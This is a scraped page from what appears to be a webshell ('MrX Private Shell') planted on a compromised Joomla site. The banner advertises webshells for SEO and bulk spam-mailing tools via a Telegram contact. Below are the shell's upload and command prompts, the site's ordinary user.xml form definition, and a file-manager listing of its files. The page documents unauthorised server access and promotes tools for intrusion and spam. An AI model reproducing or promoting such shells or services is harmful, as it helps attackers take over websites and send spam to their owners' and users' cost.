__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?xml version="1.0" encoding="UTF-8"?>
<form addfieldprefix="Joomla\Component\Users\Administrator\Field">
	<fieldset name="user_details" label="COM_USERS_USER_ACCOUNT_DETAILS">
		<field
			name="name"
			type="text"
			label="COM_USERS_USER_FIELD_NAME_LABEL"
			required="true"
		/>

		<field
			name="username"
			type="text"
			label="COM_USERS_USER_FIELD_USERNAME_LABEL"
			required="true"
		/>

		<field
			name="password"
			type="password"
			label="JGLOBAL_PASSWORD"
			rules="true"
			autocomplete="new-password"
			class="validate-password-strength"
			filter="raw"
			validate="password"
			strengthmeter="true"
			force="on"
		/>

		<field
			name="password2"
			type="password"
			label="COM_USERS_USER_FIELD_PASSWORD2_LABEL"
			autocomplete="new-password"
			class="validate-passwordExtra"
			filter="raw"
			message="COM_USERS_USER_FIELD_PASSWORD1_MESSAGE"
			validate="equals"
			field="password"
		/>

		<field
			name="email"
			type="email"
			label="JGLOBAL_EMAIL"
			required="true"
			validate="email"
			validDomains="com_users.domains"
		/>

		<field
			name="registerDate"
			type="calendar"
			label="COM_USERS_USER_FIELD_REGISTERDATE_LABEL"
			class="readonly"
			readonly="true"
			translateformat="true"
			showtime="true"
			filter="user_utc"
		/>

		<field
			name="lastvisitDate"
			type="calendar"
			label="COM_USERS_USER_FIELD_LASTVISIT_LABEL"
			class="readonly"
			readonly="true"
			translateformat="true"
			showtime="true"
			filter="user_utc"
		/>

		<field
			name="lastResetTime"
			type="calendar"
			label="COM_USERS_USER_FIELD_LASTRESET_LABEL"
			class="readonly"
			readonly="true"
			translateformat="true"
			showtime="true"
			filter="user_utc"
		/>

		<field
			name="resetCount"
			type="number"
			label="COM_USERS_USER_FIELD_RESETCOUNT_LABEL"
			class="readonly"
			default="0"
			readonly="true"
		/>

		<field
			name="sendEmail"
			type="radio"
			label="COM_USERS_USER_FIELD_SENDEMAIL_LABEL"
			default="0"
			layout="joomla.form.field.radio.switcher"
			>
			<option value="0">JNO</option>
			<option value="1">JYES</option>
		</field>

		<field
			name="block"
			type="radio"
			label="COM_USERS_USER_FIELD_BLOCK_LABEL"
			layout="joomla.form.field.radio.switcher"
			default="0"
			>
			<option value="1">COM_USERS_USER_FIELD_BLOCK</option>
			<option value="0">COM_USERS_USER_FIELD_ENABLE</option>
		</field>

		<field
			name="requireReset"
			type="radio"
			label="COM_USERS_USER_FIELD_REQUIRERESET_LABEL"
			default="0"
			layout="joomla.form.field.radio.switcher"
			>
			<option value="0">JNO</option>
			<option value="1">JYES</option>
		</field>

		<field
			name="id"
			type="text"
			label="JGLOBAL_FIELD_ID_LABEL"
			class="readonly"
			default="0"
			readonly="true"
		/>

	</fieldset>
	<field name="groups" type="hidden" />

	<fields name="params">

		<!--  Basic user account settings. -->
		<fieldset name="settings" label="COM_USERS_SETTINGS_FIELDSET_LABEL">

			<field
				name="admin_style"
				type="templatestyle"
				label="COM_USERS_USER_FIELD_BACKEND_TEMPLATE_LABEL"
				client="administrator"
				filter="uint"
				>
				<option value="">JOPTION_USE_DEFAULT</option>
			</field>

			<field
				name="colorScheme"
				type="list"
				label="COM_USERS_USER_COLORSCHEME_LABEL"
				default=""
				validate="options"
				>
				<option value="">JOPTION_USE_DEFAULT</option>
				<option value="os">COM_USERS_USER_COLORSCHEME_OPTION_FOLLOW_OS</option>
				<option value="light">COM_USERS_USER_COLORSCHEME_OPTION_LIGHT</option>
				<option value="dark">COM_USERS_USER_COLORSCHEME_OPTION_DARK</option>
			</field>

			<field
				name="allowTourAutoStart"
				type="list"
				label="COM_USERS_USER_ALLOWTOURAUTOSTART_LABEL"
				default=""
				validate="options"
				>
				<option value="">JOPTION_USE_DEFAULT</option>
				<option value="0">JNO</option>
				<option value="1">JYES</option>
			</field>

			<field
				name="admin_language"
				type="language"
				label="COM_USERS_USER_FIELD_BACKEND_LANGUAGE_LABEL"
				client="administrator"
				>
				<option value="">JOPTION_USE_DEFAULT</option>
			</field>

			<field
				name="language"
				type="language"
				label="COM_USERS_USER_FIELD_FRONTEND_LANGUAGE_LABEL"
				client="site"
				>
				<option value="">JOPTION_USE_DEFAULT</option>
			</field>

			<field
				name="editor"
				type="plugins"
				label="COM_USERS_USER_FIELD_EDITOR_LABEL"
				folder="editors"
				>
				<option value="">JOPTION_USE_DEFAULT</option>
			</field>

			<field
				name="timezone"
				type="timezone"
				label="COM_USERS_USER_FIELD_TIMEZONE_LABEL"
				layout="joomla.form.field.groupedlist-fancy-select"
				>
				<option value="">JOPTION_USE_DEFAULT</option>
			</field>

		</fieldset>
		<!-- User accessibility settings -->
		<fieldset
			name="accessibility"
			label="COM_USERS_A11Y_SETTINGS_FIELDSET_LABEL"
			description="COM_USERS_A11Y_SETTINGS_FIELDSET_DESC"
		>
			<field
				name="a11y_mono"
				type="radio"
				label="COM_USERS_A11Y_SETTINGS_FIELD_MONOCHROME"
				layout="joomla.form.field.radio.switcher"
				default="0"
				>
				<option value="0">JNO</option>
				<option value="monochrome">JYES</option>
			</field>
			<field
				name="a11y_contrast"
				type="radio"
				label="COM_USERS_A11Y_SETTINGS_FIELD_CONTRAST"
				layout="joomla.form.field.radio.switcher"
				default="0"
				>
				<option value="0">JNO</option>
				<option value="high_contrast">JYES</option>
			</field>
			<field
				name="a11y_highlight"
				type="radio"
				label="COM_USERS_A11Y_SETTINGS_FIELD_HIGHLIGHT"
				layout="joomla.form.field.radio.switcher"
				default="0"
				>
				<option value="0">JNO</option>
				<option value="highlight">JYES</option>
			</field>
			<field
				name="a11y_font"
				type="radio"
				label="COM_USERS_A11Y_SETTINGS_FIELD_FONTSIZE"
				layout="joomla.form.field.radio.switcher"
				default="0"
				>
				<option value="0">JNO</option>
				<option value="fontsize">JYES</option>
			</field>
		</fieldset>

	</fields>
</form>

Filemanager

Name Type Size Permission Actions
fields Folder 0775
category.xml File 146 B 0664
config_domain.xml File 697 B 0664
filter_debuggroup.xml File 1.84 KB 0664
filter_debuguser.xml File 1.84 KB 0664
filter_groups.xml File 1.03 KB 0664
filter_levels.xml File 1.04 KB 0664
filter_notes.xml File 2.03 KB 0664
filter_users.xml File 3 KB 0664
group.xml File 767 B 0664
level.xml File 490 B 0664
mail.xml File 1.04 KB 0664
note.xml File 2.32 KB 0664
user.xml File 5.83 KB 0664
Filemanager